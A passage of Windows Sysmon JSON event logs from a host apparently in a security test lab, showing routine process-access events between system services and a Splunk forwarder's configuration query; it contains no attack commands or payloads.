ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1760,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1761,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1762,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1763,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1764,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1765,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1766,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.127\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010807C0300}\r\nTargetProcessId: 4016\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.127","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010807C0300}","TargetProcessId":"4016","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1767,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.134\r\nProcessGuid: {41C8662E-1F75-5F25-0000-00103B7D0300}\r\nProcessId: 4036\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-0010807C0300}\r\nParentProcessId: 4016\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.134","ProcessGuid":"{41C8662E-1F75-5F25-0000-00103B7D0300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-0010807C0300}","ParentProcessId":"4016","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
